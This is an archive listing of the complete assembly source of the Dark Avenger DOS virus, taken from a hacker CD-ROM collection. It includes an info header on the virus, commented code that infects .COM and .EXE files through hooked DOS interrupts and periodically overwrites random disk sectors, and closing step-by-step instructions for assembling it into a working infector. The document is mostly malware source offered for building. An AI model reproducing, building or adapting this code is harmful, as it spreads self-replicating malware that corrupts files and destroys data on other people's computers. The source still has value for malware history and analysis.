home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / virus / virusprogramming / darkav.asm < prev    next >
Encoding:
Assembly Source File  |  1996-04-16  |  26.2 KB  |  1,035 lines

  1. Virus Name:  Dark Avenger
  2. Aliases:     Amilia, Black Avenger, Boroda, Eddie, Diana, Rabid Avenger,
  3.          VAN Soft, PS!KO, Evil Men, Dark Quest
  4. V Status:    Common
  5. Discovery:   September, 1989
  6. Symptoms:    TSR; .COM, .EXE, .SYS file growth; file/disk corruption
  7. Origin:      Bulgaria
  8. Isolated:    Davis, California, United States
  9. Eff Length:  1,800 bytes
  10. Type Code:   PRsAK - Parasitic Resident .COM & .EXE Infector
  11. Detection Method:  ViruScan, F-Prot, AVTK, NAV, Sweep, CPAV, UTScan, IBMAV,
  12.            VirexPC, VBuster, VNet, Panda, Vi-Spy, MSAV, DrVirus,
  13.            PCRX,
  14.            NShld, LProt, CPAV/N, Sweep/N, Innoc, NProt, AVTK/N,
  15.            NAV/N
  16. Removal Instructions:  CleanUp, F-Prot, NAV or delete infected files
  17.  
  18.  
  19. code    segment
  20.     assume  cs:code,ds:code
  21. copyright:
  22.         db      'Eddie lives...somewhere in time!',0
  23. date_stamp:
  24.         dd      12239000h
  25. checksum:
  26.         db      30
  27.  
  28. ; Return the control to an .EXE file:
  29. ; Restores DS=ES=PSP, loads SS:SP and CS:IP.
  30.  
  31.  
  32.  
  33.  
  34.  
  35. exit_exe:
  36.         mov     bx,es
  37.         add     bx,10h
  38.         add     bx,word ptr cs:[si+call_adr+2]
  39.         mov     word ptr cs:[si+patch+2],bx
  40.         mov     bx,word ptr cs:[si+call_adr]
  41.         mov     word ptr cs:[si+patch],bx
  42.         mov     bx,es
  43.         add     bx,10h
  44.         add     bx,word ptr cs:[si+stack_pointer+2]
  45.         mov     ss,bx
  46.         mov     sp,word ptr cs:[si+stack_pointer]
  47.         db      0eah                    ;JMP XXXX:YYYY
  48. patch:
  49.         dd      0
  50.  
  51. ; Returns control to a .COM file:
  52. ; Restores the first 3 bytes in the
  53. ; beginning of the file, loads SP and IP.
  54.  
  55. exit_com:
  56.  
  57.  
  58.  
  59.  
  60.         mov     di,100h
  61.         add     si,offset my_save
  62.         movsb
  63.         movsw
  64.         mov     sp,ds:[6]               ;This is incorrect
  65.         xor     bx,bx
  66.         push    bx
  67.         jmp     [si-11]                 ;si+call_adr-top_file
  68.  
  69. ; Program entry point
  70.  
  71. startup:
  72.         call    relative
  73. relative:
  74.         pop     si                      ;SI = $
  75.         sub     si,offset relative
  76.         cld
  77.         cmp     word ptr cs:[si+my_save],5a4dh
  78.         je      exe_ok
  79.         cli
  80.         mov     sp,si                   ;A separate stack is supported 
  81. for
  82.         add     sp,offset top_file+100h ;the .COM files, in order not to
  83.         sti                             ;overlap the stack by the 
  84. program
  85.         cmp     sp,ds:[6]
  86.         jnc     exit_com
  87. exe_ok:
  88.         push    ax
  89.         push    es
  90.         push    si
  91.         push    ds
  92.         mov     di,si
  93.  
  94. ; Looking for the address of INT 13h handler in ROM-BIOS
  95.  
  96.         xor     ax,ax
  97.         push    ax
  98.         mov     ds,ax
  99.         les     ax,ds:[13h*4]
  100.         mov     word ptr cs:[si+fdisk],ax
  101.         mov     word ptr cs:[si+fdisk+2],es
  102.         mov     word ptr cs:[si+disk],ax
  103.         mov     word ptr cs:[si+disk+2],es
  104.         mov     ax,ds:[40h*4+2]         ;The INT 13h vector is moved to 
  105. INT 40h
  106.         cmp     ax,0f000h               ;for diskettes if a hard disk is
  107.         jne     nofdisk                 ;available
  108.         mov     word ptr cs:[si+disk+2],ax
  109.         mov     ax,ds:[40h*4]
  110.         mov     word ptr cs:[si+disk],ax
  111.         mov     dl,80h
  112.         mov     ax,ds:[41h*4+2]         ;INT 41h usually points the 
  113. segment,
  114.         cmp     ax,0f000h               ;where the original INT 13h 
  115. vector is
  116.         je      isfdisk
  117.         cmp     ah,0c8h
  118.         jc      nofdisk
  119.         cmp     ah,0f4h
  120.         jnc     nofdisk
  121.         test    al,7fh
  122.         jnz     nofdisk
  123.         mov     ds,ax
  124.         cmp     ds:[0],0aa55h
  125.         jne     nofdisk
  126.         mov     dl,ds:[2]
  127. isfdisk:
  128.         mov     ds,ax
  129.         xor     dh,dh
  130.         mov     cl,9
  131.         shl     dx,cl
  132.         mov     cx,dx
  133.         xor     si,si
  134. findvect:
  135.         lodsw                           ;Occasionally begins with:
  136.         cmp     ax,0fa80h               ;       CMP     DL,80h
  137.         jne     altchk                  ;       JNC     somewhere
  138.         lodsw
  139.         cmp     ax,7380h
  140.         je      intchk
  141.         jne     nxt0
  142. altchk:
  143.         cmp     ax,0c2f6h               ;or with:
  144.         jne     nxt                     ;       TEST    DL,80h
  145.         lodsw                           ;       JNZ     somewhere
  146.         cmp     ax,7580h
  147.         jne     nxt0
  148. intchk:
  149.         inc     si                      ;then there is:
  150.         lodsw                           ;       INT     40h
  151.         cmp     ax,40cdh
  152.         je      found
  153.         sub     si,3
  154. nxt0:
  155.         dec     si
  156.         dec     si
  157. nxt:
  158.         dec     si
  159.         loop    findvect
  160.         jmp     short nofdisk
  161. found:
  162.         sub     si,7
  163.         mov     word ptr cs:[di+fdisk],si
  164.         mov     word ptr cs:[di+fdisk+2],ds
  165. nofdisk:
  166.         mov     si,di
  167.         pop     ds
  168.  
  169. ; Check whether the program is present in memory:
  170.  
  171.         les     ax,ds:[21h*4]
  172.         mov     word ptr cs:[si+save_int_21],ax
  173.         mov     word ptr cs:[si+save_int_21+2],es
  174.         push    cs
  175.         pop     ds
  176.         cmp     ax,offset int_21
  177.         jne     bad_func
  178.         xor     di,di
  179.         mov     cx,offset my_size
  180. scan_func:
  181.         lodsb
  182.         scasb
  183.         jne     bad_func
  184.         loop    scan_func
  185.         pop     es
  186.         jmp     go_program
  187.  
  188. ; Move the program to the top of memory:
  189. ; (it's full of rubbish and bugs here)
  190.  
  191. bad_func:
  192.         pop     es
  193.         mov     ah,49h
  194.         int     21h
  195.         mov     bx,0ffffh
  196.         mov     ah,48h
  197.         int     21h
  198.         sub     bx,(top_bz+my_bz+1ch-1)/16+2
  199.         jc      go_program
  200.         mov     cx,es
  201.         stc
  202.         adc     cx,bx
  203.         mov     ah,4ah
  204.         int     21h
  205.         mov     bx,(offset top_bz+offset my_bz+1ch-1)/16+1
  206.         stc
  207.         sbb     es:[2],bx
  208.         push    es
  209.         mov     es,cx
  210.         mov     ah,4ah
  211.         int     21h
  212.         mov     ax,es
  213.         dec     ax
  214.         mov     ds,ax
  215.         mov     word ptr ds:[1],8
  216.         call    mul_16
  217.         mov     bx,ax
  218.         mov     cx,dx
  219.         pop     ds
  220.         mov     ax,ds
  221.         call    mul_16
  222.         add     ax,ds:[6]
  223.         adc     dx,0
  224.         sub     ax,bx
  225.         sbb     dx,cx
  226.         jc      mem_ok
  227.         sub     ds:[6],ax               ;Reduction of the segment size
  228. mem_ok:
  229.         pop     si
  230.         push    si
  231.         push    ds
  232.         push    cs
  233.         xor     di,di
  234.         mov     ds,di
  235.         lds     ax,ds:[27h*4]
  236.         mov     word ptr cs:[si+save_int_27],ax
  237.         mov     word ptr cs:[si+save_int_27+2],ds
  238.         pop     ds
  239.         mov     cx,offset aux_size
  240.         rep     movsb
  241.         xor     ax,ax
  242.         mov     ds,ax
  243.         mov     ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h
  244.         mov     ds:[21h*4+2],es
  245.         mov     ds:[27h*4],offset int_27
  246.         mov     ds:[27h*4+2],es
  247.         mov     word ptr es:[filehndl],ax
  248.         pop     es
  249. go_program:
  250.         pop     si
  251.  
  252. ; Smash the next disk sector:
  253.  
  254.         xor     ax,ax
  255.         mov     ds,ax
  256.         mov     ax,ds:[13h*4]
  257.         mov     word ptr cs:[si+save_int_13],ax
  258.         mov     ax,ds:[13h*4+2]
  259.         mov     word ptr cs:[si+save_int_13+2],ax
  260.         mov     ds:[13h*4],offset int_13
  261.         add     ds:[13h*4],si
  262.         mov     ds:[13h*4+2],cs
  263.         pop     ds
  264.         push    ds
  265.         push    si
  266.         mov     bx,si
  267.         lds     ax,ds:[2ah]
  268.         xor     si,si
  269.         mov     dx,si
  270. scan_envir:                             ;Fetch program's name
  271.         lodsw                           ;(with DOS 2.x it doesn't work 
  272. anyway)
  273.         dec     si
  274.         test    ax,ax
  275.         jnz     scan_envir
  276.         add     si,3
  277.         lodsb
  278.  
  279. ; The following instruction is a complete nonsense.  Try to enter a 
  280. drive &
  281. ; directory path in lowercase, then run an infected program from there.
  282. ; As a result of an error here + an error in DOS the next sector is not
  283. ; smashed. Two memory bytes are smashed instead, most probably onto the
  284. ; infected program.
  285.  
  286.         sub     al,'A'
  287.         mov     cx,1
  288.         push    cs
  289.         pop     ds
  290.         add     bx,offset int_27
  291.         push    ax
  292.         push    bx
  293.         push    cx
  294.         int     25h
  295.         pop     ax
  296.         pop     cx
  297.         pop     bx
  298.         inc     byte ptr [bx+0ah]
  299.         and     byte ptr [bx+0ah],0fh   ;It seems that 15 times doing
  300.         jnz     store_sec               ;nothing is not enough for some.
  301.         mov     al,[bx+10h]
  302.         xor     ah,ah
  303.         mul     word ptr [bx+16h]
  304.         add     ax,[bx+0eh]
  305.         push    ax
  306.         mov     ax,[bx+11h]
  307.         mov     dx,32
  308.         mul     dx
  309.         div     word ptr [bx+0bh]
  310.         pop     dx
  311.         add     dx,ax
  312.         mov     ax,[bx+8]
  313.         add     ax,40h
  314.         cmp     ax,[bx+13h]
  315.         jc      store_new
  316.         inc     ax
  317.         and     ax,3fh
  318.         add     ax,dx
  319.         cmp     ax,[bx+13h]
  320.         jnc     small_disk
  321. store_new:
  322.         mov     [bx+8],ax
  323. store_sec:
  324.         pop     ax
  325.         xor     dx,dx
  326.         push    ax
  327.         push    bx
  328.         push    cx
  329.         int     26h
  330.  
  331.  
  332. ; The writing trough this interrupt is not the smartest thing, bacause 
  333. it
  334. ; can be intercepted (what Vesselin Bontchev has managed to notice).
  335.  
  336.         pop     ax
  337.         pop     cx
  338.         pop     bx
  339.         pop     ax
  340.         cmp     byte ptr [bx+0ah],0
  341.         jne     not_now
  342.         mov     dx,[bx+8]
  343.         pop     bx
  344.         push    bx
  345.         int     26h
  346. small_disk:
  347.         pop     ax
  348. not_now:
  349.         pop     si
  350.         xor     ax,ax
  351.         mov     ds,ax
  352.         mov     ax,word ptr cs:[si+save_int_13]
  353.         mov     ds:[13h*4],ax
  354.         mov     ax,word ptr cs:[si+save_int_13+2]
  355.         mov     ds:[13h*4+2],ax
  356.         pop     ds
  357.         pop     ax
  358.         cmp     word ptr cs:[si+my_save],5a4dh
  359.         jne     go_exit_com
  360.         jmp     exit_exe
  361. go_exit_com:
  362.         jmp     exit_com
  363. int_24:
  364.         mov     al,3                    ;This instruction seems 
  365. unnecessary
  366.         iret
  367.  
  368. ; INT 27h handler (this is necessary)
  369.  
  370. int_27:
  371.         pushf
  372.         call    alloc
  373.         popf
  374.         jmp     dword ptr cs:[save_int_27]
  375.  
  376. ; During the DOS functions Set & Get Vector it seems that the virus has 
  377. not
  378. ; intercepted them (this is a doubtfull advantage and it is a possible
  379. ; source of errors with some "intelligent" programs)
  380.  
  381. set_int_27:
  382.         mov     word ptr cs:[save_int_27],dx
  383.         mov     word ptr cs:[save_int_27+2],ds
  384.         popf
  385.         iret
  386. set_int_21:
  387.         mov     word ptr cs:[save_int_21],dx
  388.         mov     word ptr cs:[save_int_21+2],ds
  389.         popf
  390.         iret
  391. get_int_27:
  392.         les     bx,dword ptr cs:[save_int_27]
  393.         popf
  394.         iret
  395. get_int_21:
  396.         les     bx,dword ptr cs:[save_int_21]
  397.         popf
  398.         iret
  399.  
  400. exec:
  401.  
  402.  
  403.         call    do_file
  404.         call    alloc
  405.         popf
  406.         jmp     dword ptr cs:[save_int_21]
  407.  
  408.         db      'Diana P.',0
  409.  
  410. ; INT 21h handler.  Infects files during execution, copying, browsing or
  411. ; creating and some other operations. The execution of functions 0 and 
  412. 26h
  413. ; has bad consequences.
  414.  
  415. int_21:
  416.         push    bp
  417.         mov     bp,sp
  418.         push    [bp+6]
  419.         popf
  420.         pop     bp
  421.         pushf
  422.         call    ontop
  423.         cmp     ax,2521h
  424.         je      set_int_21
  425.         cmp     ax,2527h
  426.         je      set_int_27
  427.         cmp     ax,3521h
  428.         je      get_int_21
  429.         cmp     ax,3527h
  430.         je      get_int_27
  431.         cld
  432.         cmp     ax,4b00h
  433.         je      exec
  434.         cmp     ah,3ch
  435.         je      create
  436.         cmp     ah,3eh
  437.         je      close
  438.         cmp     ah,5bh
  439.         jne     not_create
  440. create:
  441.         cmp     word ptr cs:[filehndl],0;May be 0 if the file is open
  442.         jne     dont_touch
  443.         call    see_name
  444.         jnz     dont_touch
  445.         call    alloc
  446.         popf
  447.         call    function
  448.         jc      int_exit
  449.         pushf
  450.         push    es
  451.         push    cs
  452.         pop     es
  453.         push    si
  454.         push    di
  455.         push    cx
  456.         push    ax
  457.         mov     di,offset filehndl
  458.         stosw
  459.         mov     si,dx
  460.         mov     cx,65
  461. move_name:
  462.         lodsb
  463.         stosb
  464.         test    al,al
  465.         jz      all_ok
  466.         loop    move_name
  467.         mov     word ptr es:[filehndl],cx
  468. all_ok:
  469.         pop     ax
  470.         pop     cx
  471.         pop     di
  472.         pop     si
  473.         pop     es
  474. go_exit:
  475.         popf
  476.         jnc     int_exit                ;JMP
  477. close:
  478.         cmp     bx,word ptr cs:[filehndl]
  479.         jne     dont_touch
  480.         test    bx,bx
  481.         jz      dont_touch
  482.         call    alloc
  483.         popf
  484.         call    function
  485.         jc      int_exit
  486.         pushf
  487.         push    ds
  488.         push    cs
  489.         pop     ds
  490.         push    dx
  491.         mov     dx,offset filehndl+2
  492.         call    do_file
  493.         mov     word ptr cs:[filehndl],0
  494.         pop     dx
  495.         pop     ds
  496.         jmp     go_exit
  497. not_create:
  498.         cmp     ah,3dh
  499.         je      touch
  500.         cmp     ah,43h
  501.         je      touch
  502.         cmp     ah,56h                  ;Unfortunately, the command 
  503. inter-
  504.         jne     dont_touch              ;preter does not use this 
  505. function
  506. touch:
  507.         call    see_name
  508.         jnz     dont_touch
  509.         call    do_file
  510. dont_touch:
  511.         call    alloc
  512.         popf
  513.         call    function
  514. int_exit:
  515.         pushf
  516.         push    ds
  517.         call    get_chain
  518.         mov     byte ptr ds:[0],'Z'
  519.         pop     ds
  520.         popf
  521. dummy   proc    far                     ;???
  522.         ret     2
  523. dummy   endp
  524.  
  525. ; Checks whether the file is .COM or .EXE.
  526. ; It is not called upon file execution.
  527.  
  528. see_name:
  529.         push    ax
  530.         push    si
  531.         mov     si,dx
  532. scan_name:
  533.         lodsb
  534.         test    al,al
  535.         jz      bad_name
  536.         cmp     al,'.'
  537.         jnz     scan_name
  538.         call    get_byte
  539.         mov     ah,al
  540.         call    get_byte
  541.         cmp     ax,'co'
  542.         jz      pos_com
  543.         cmp     ax,'ex'
  544.         jnz     good_name
  545.         call    get_byte
  546.         cmp     al,'e'
  547.         jmp     short good_name
  548. pos_com:
  549.         call    get_byte
  550.         cmp     al,'m'
  551.         jmp     short good_name
  552. bad_name:
  553.         inc     al
  554. good_name:
  555.         pop     si
  556.         pop     ax
  557.         ret
  558.  
  559. ; Converts into lowercase (the subroutines are a great thing).
  560.  
  561. get_byte:
  562.         lodsb
  563.         cmp     al,'C'
  564.         jc      byte_got
  565.         cmp     al,'Y'
  566.         jnc     byte_got
  567.         add     al,20h
  568. byte_got:
  569.         ret
  570.  
  571. ; Calls the original INT 21h.
  572.  
  573. function:
  574.         pushf
  575.         call    dword ptr cs:[save_int_21]
  576.         ret
  577.  
  578. ; Arrange to infect an executable file.
  579.  
  580. do_file:
  581.         push    ds                      ;Save the registers in stack
  582.         push    es
  583.         push    si
  584.         push    di
  585.         push    ax
  586.         push    bx
  587.         push    cx
  588.         push    dx
  589.         mov     si,ds
  590.         xor     ax,ax
  591.         mov     ds,ax
  592.         les     ax,ds:[24h*4]           ;Saves INT 13h and INT 24h in 
  593. stack
  594.         push    es                      ;and changes them with what is 
  595. needed
  596.         push    ax
  597.         mov     ds:[24h*4],offset int_24
  598.         mov     ds:[24h*4+2],cs
  599.         les     ax,ds:[13h*4]
  600.         mov     word ptr cs:[save_int_13],ax
  601.         mov     word ptr cs:[save_int_13+2],es
  602.         mov     ds:[13h*4],offset int_13
  603.         mov     ds:[13h*4+2],cs
  604.         push    es
  605.         push    ax
  606.         mov     ds,si
  607.         xor     cx,cx                   ;Arranges to infect Read-only 
  608. files
  609.         mov     ax,4300h
  610.         call    function
  611.         mov     bx,cx
  612.         and     cl,0feh
  613.         cmp     cl,bl
  614.         je      dont_change
  615.         mov     ax,4301h
  616.         call    function
  617.         stc
  618. dont_change:
  619.         pushf
  620.         push    ds
  621.         push    dx
  622.         push    bx
  623.         mov     ax,3d02h                ;Now we can safely open the file
  624.         call    function
  625.         jc      cant_open
  626.         mov     bx,ax
  627.         call    disease
  628.         mov     ah,3eh                  ;Close it
  629.  
  630.         call    function
  631. cant_open:
  632.         pop     cx
  633.         pop     dx
  634.         pop     ds
  635.         popf
  636.         jnc     no_update
  637.         mov     ax,4301h                ;Restores file's attributes
  638.         call    function                ;if they were changed (just in 
  639. case)
  640. no_update:
  641.         xor     ax,ax                   ;Restores INT 13h and INT 24h
  642.         mov     ds,ax
  643.         pop     ds:[13h*4]
  644.         pop     ds:[13h*4+2]
  645.         pop     ds:[24h*4]
  646.         pop     ds:[24h*4+2]
  647.         pop     dx                      ;Register restoration
  648.         pop     cx
  649.         pop     bx
  650.         pop     ax
  651.         pop     di
  652.         pop     si
  653.         pop     es
  654.         pop     ds
  655.         ret
  656.  
  657. ; This routine is the working horse.
  658.  
  659. disease:
  660.         push    cs
  661.         pop     ds
  662.         push    cs
  663.         pop     es
  664.         mov     dx,offset top_save      ;Read the file beginning
  665.         mov     cx,18h
  666.         mov     ah,3fh
  667.         int     21h
  668.         xor     cx,cx
  669.         xor     dx,dx
  670.         mov     ax,4202h                ;Save file length
  671.         int     21h
  672.         mov     word ptr [top_save+1ah],dx
  673.         cmp     ax,offset my_size       ;This should be top_file
  674.         sbb     dx,0
  675.         jc      stop_fuck_2             ;Small files are not infected
  676.         mov     word ptr [top_save+18h],ax
  677.         cmp     word ptr [top_save],5a4dh
  678.         jne     com_file
  679.         mov     ax,word ptr [top_save+8]
  680.         add     ax,word ptr [top_save+16h]
  681.         call    mul_16
  682.         add     ax,word ptr [top_save+14h]
  683.         adc     dx,0
  684.         mov     cx,dx
  685.         mov     dx,ax
  686.         jmp     short see_sick
  687. com_file:
  688.         cmp     byte ptr [top_save],0e9h
  689.         jne     see_fuck
  690.         mov     dx,word ptr [top_save+1]
  691.         add     dx,103h
  692.         jc      see_fuck
  693.         dec     dh
  694.         xor     cx,cx
  695.  
  696. ; Check if the file is properly infected
  697.  
  698.  
  699. see_sick:
  700.         sub     dx,startup-copyright
  701.         sbb     cx,0
  702.         mov     ax,4200h
  703.         int     21h
  704.         add     ax,offset top_file
  705.         adc     dx,0
  706.         cmp     ax,word ptr [top_save+18h]
  707.         jne     see_fuck
  708.         cmp     dx,word ptr [top_save+1ah]
  709.         jne     see_fuck
  710.         mov     dx,offset top_save+1ch
  711.         mov     si,dx
  712.         mov     cx,offset my_size
  713.         mov     ah,3fh
  714.         int     21h
  715.         jc      see_fuck
  716.         cmp     cx,ax
  717.         jne     see_fuck
  718.         xor     di,di
  719. next_byte:
  720.  
  721.         lodsb
  722.         scasb
  723.         jne     see_fuck
  724.         loop    next_byte
  725. stop_fuck_2:
  726.         ret
  727. see_fuck:
  728.         xor     cx,cx                   ;Seek to the end of file
  729.         xor     dx,dx
  730.         mov     ax,4202h
  731.         int     21h
  732.         cmp     word ptr [top_save],5a4dh
  733.         je      fuck_exe
  734.         add     ax,offset aux_size+200h ;Watch out for too big .COM 
  735. files
  736.         adc     dx,0
  737.         je      fuck_it
  738.         ret
  739.  
  740. ; Pad .EXE files to paragraph boundary. This is absolutely unnecessary.
  741.  
  742. fuck_exe:
  743.         mov     dx,word ptr [top_save+18h]
  744.         neg     dl
  745.         and     dx,0fh
  746.         xor     cx,cx
  747.         mov     ax,4201h
  748.         int     21h
  749.         mov     word ptr [top_save+18h],ax
  750.         mov     word ptr [top_save+1ah],dx
  751. fuck_it:
  752.         mov     ax,5700h                ;Get file's date
  753.         int     21h
  754.         pushf
  755.         push    cx
  756.         push    dx
  757.         cmp     word ptr [top_save],5a4dh
  758.         je      exe_file                ;Very clever, isn't it?
  759.         mov     ax,100h
  760.         jmp     short set_adr
  761. exe_file:
  762.         mov     ax,word ptr [top_save+14h]
  763.         mov     dx,word ptr [top_save+16h]
  764. set_adr:
  765.         mov     di,offset call_adr
  766.         stosw
  767.         mov     ax,dx
  768.         stosw
  769.         mov     ax,word ptr [top_save+10h]
  770.         stosw
  771.         mov     ax,word ptr [top_save+0eh]
  772.         stosw
  773.         mov     si,offset top_save      ;This offers the possibilities 
  774. to
  775.         movsb                           ;some nasty programs to restore
  776.         movsw                           ;exactly the original length
  777.         xor     dx,dx                   ;of the .EXE files
  778.         mov     cx,offset top_file
  779.         mov     ah,40h
  780.         int     21h                     ;Write the virus
  781.         jc      go_no_fuck              ;(don't trace here)
  782.         xor     cx,ax
  783.         jnz     go_no_fuck
  784.         mov     dx,cx
  785.         mov     ax,4200h
  786.         int     21h
  787.         cmp     word ptr [top_save],5a4dh
  788.         je      do_exe
  789.         mov     byte ptr [top_save],0e9h
  790.         mov     ax,word ptr [top_save+18h]
  791.         add     ax,startup-copyright-3
  792.         mov     word ptr [top_save+1],ax
  793.         mov     cx,3
  794.         jmp     short write_header
  795. go_no_fuck:
  796.         jmp     short no_fuck
  797.  
  798. ; Construct the .EXE file's header
  799.  
  800. do_exe:
  801.         call    mul_hdr
  802.         not     ax
  803.         not     dx
  804.         inc     ax
  805.         jne     calc_offs
  806.         inc     dx
  807. calc_offs:
  808.         add     ax,word ptr [top_save+18h]
  809.         adc     dx,word ptr [top_save+1ah]
  810.         mov     cx,10h
  811.         div     cx
  812.         mov     word ptr [top_save+14h],startup-copyright
  813.         mov     word ptr [top_save+16h],ax
  814.         add     ax,(offset top_file-offset copyright-1)/16+1
  815.         mov     word ptr [top_save+0eh],ax
  816.         mov     word ptr [top_save+10h],100h
  817.         add     word ptr [top_save+18h],offset top_file
  818.         adc     word ptr [top_save+1ah],0
  819.         mov     ax,word ptr [top_save+18h]
  820.         and     ax,1ffh
  821.         mov     word ptr [top_save+2],ax
  822.         pushf
  823.         mov     ax,word ptr [top_save+19h]
  824.         shr     byte ptr [top_save+1bh],1
  825.         rcr     ax,1
  826.         popf
  827.         jz      update_len
  828.         inc     ax
  829. update_len:
  830.         mov     word ptr [top_save+4],ax
  831.         mov     cx,18h
  832. write_header:
  833.         mov     dx,offset top_save
  834.         mov     ah,40h
  835.         int     21h                     ;Write the file beginning
  836. no_fuck:
  837.         pop     dx
  838.         pop     cx
  839.         popf
  840.         jc      stop_fuck
  841.         mov     ax,5701h                ;Restore the original file date
  842.         int     21h
  843. stop_fuck:
  844.         ret
  845.  
  846. ; The following is used by the INT 21h and INT 27h handlers in 
  847. connection
  848. ; to the program hiding in memory from those who don't need to see it.
  849. ; The whole system is absurde and meaningless and it is also another 
  850. source
  851. ; for program conflicts.
  852.  
  853. alloc:
  854.         push    ds
  855.         call    get_chain
  856.         mov     byte ptr ds:[0],'M'
  857.         pop     ds
  858.  
  859. ; Assures that the program is the first one in the processes,
  860. ; which have intercepted INT 21h (yet another source of conflicts).
  861.  
  862. ontop:
  863.         push    ds
  864.         push    ax
  865.         push    bx
  866.         push    dx
  867.         xor     bx,bx
  868.         mov     ds,bx
  869.         lds     dx,ds:[21h*4]
  870.         cmp     dx,offset int_21
  871.         jne     search_segment
  872.         mov     ax,ds
  873.         mov     bx,cs
  874.         cmp     ax,bx
  875.         je      test_complete
  876.  
  877. ; Searches the segment of the sucker who has intercepted INT 21h, in
  878. ; order to find where it has stored the old values and to replace them.
  879. ; Nothing is done for INT 27h.
  880.  
  881.         xor     bx,bx
  882. search_segment:
  883.         mov     ax,[bx]
  884.         cmp     ax,offset int_21
  885.         jne     search_next
  886.         mov     ax,cs
  887.         cmp     ax,[bx+2]
  888.         je      got_him
  889. search_next:
  890.         inc     bx
  891.         jne     search_segment
  892.         je      return_control
  893. got_him:
  894.         mov     ax,word ptr cs:[save_int_21]
  895.         mov     [bx],ax
  896.         mov     ax,word ptr cs:[save_int_21+2]
  897.         mov     [bx+2],ax
  898.         mov     word ptr cs:[save_int_21],dx
  899.         mov     word ptr cs:[save_int_21+2],ds
  900.         xor     bx,bx
  901.  
  902. ; Even if he has not saved them in the same segment, this won't help 
  903. him.
  904.  
  905. return_control:
  906.         mov     ds,bx
  907.         mov     ds:[21h*4],offset int_21
  908.         mov     ds:[21h*4+2],cs
  909. test_complete:
  910.         pop     dx
  911.         pop     bx
  912.         pop     ax
  913.         pop     ds
  914.         ret
  915.  
  916. ; Fetch the segment of the last MCB
  917.  
  918. get_chain:
  919.         push    ax
  920.         push    bx
  921.         mov     ah,62h
  922.         call    function
  923.         mov     ax,cs
  924.         dec     ax
  925.         dec     bx
  926. next_blk:
  927.         mov     ds,bx
  928.         stc
  929.         adc     bx,ds:[3]
  930.         cmp     bx,ax
  931.         jc      next_blk
  932.         pop     bx
  933.         pop     ax
  934.         ret
  935.  
  936. ; Multiply by 16
  937.  
  938. mul_hdr:
  939.         mov     ax,word ptr [top_save+8]
  940. mul_16:
  941.         mov     dx,10h
  942.         mul     dx
  943.         ret
  944.  
  945.         db      'This program was written in the city of Sofia '
  946.         db      '(C) 1988-89 Dark Avenger',0
  947.  
  948. ; INT 13h handler.
  949. ; Calls the original vectors in BIOS, if it's a writing call
  950.  
  951. int_13:
  952.         cmp     ah,3
  953.         jnz     subfn_ok
  954.         cmp     dl,80h
  955.         jnc     hdisk
  956.         db      0eah                    ;JMP XXXX:YYYY
  957. my_size:                                ;--- Up to here comparison
  958. disk:                                   ; with the original is made
  959.         dd      0
  960. hdisk:
  961.         db      0eah                    ;JMP XXXX:YYYY
  962. fdisk:
  963.         dd      0
  964. subfn_ok:
  965.         db      0eah                    ;JMP XXXX:YYYY
  966. save_int_13:
  967.         dd      0
  968. call_adr:
  969.         dd      100h
  970.  
  971. stack_pointer:
  972.         dd      0                       ;The original value of SS:SP
  973. my_save:
  974.         int     20h                     ;The original contents of the 
  975. first
  976.         nop                             ;3 bytes of the file
  977. top_file:                               ;--- Up to here the code is 
  978. written
  979. filehndl    equ $                       ; in the files
  980. filename    equ filehndl+2              ;Buffer for the name of the 
  981. opened file
  982. save_int_27 equ filename+65             ;Original INT 27h vector
  983. save_int_21 equ save_int_27+4           ;Original INT 21h vector
  984. aux_size    equ save_int_21+4           ;--- Up to here is moved into 
  985. memory
  986. top_save    equ save_int_21+4           ;Beginning of the buffer, which
  987.                                         ;contains
  988.                                         ; - The first 24 bytes read from 
  989. file
  990.                                         ; - File length (4 bytes)
  991.                                         ; - The last bytes of the file
  992.                                         ;   (my_size bytes)
  993. top_bz      equ top_save-copyright
  994. my_bz       equ my_size-copyright
  995.  
  996. code    ends
  997.         end
  998.  
  999. ------------------------------------------------------------------------
  1000. ------
  1001.  
  1002.      A few notes on assembling this virus.
  1003.  
  1004.      It's a little bit tricky assembling the Dark Avenger Virus.  Use
  1005.      these steps below.  I use Turbo Assembler 2.0, but I'm positve that
  1006.      MASM will work just as well.
  1007.  
  1008.      1:
  1009.          TASM AVENGER.ASM
  1010.  
  1011.      2:
  1012.          TLINK AVENGER.OBJ
  1013.  
  1014.      3:
  1015.          EXE2BIN AVENGER AVENGER.COM
  1016.  
  1017.      Now make a 3 byte file named JUMP.TMP using DEBUG like this
  1018.  
  1019.      4:  DEBUG
  1020.  
  1021.          n jmp.tmp
  1022.          e 0100  E9 68 00
  1023.  
  1024.          rcx
  1025.          3
  1026.          w
  1027.          q
  1028.  
  1029.       5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM
  1030.  
  1031.          There you have it....
  1032.  
  1033.  
  1034.  
  1035.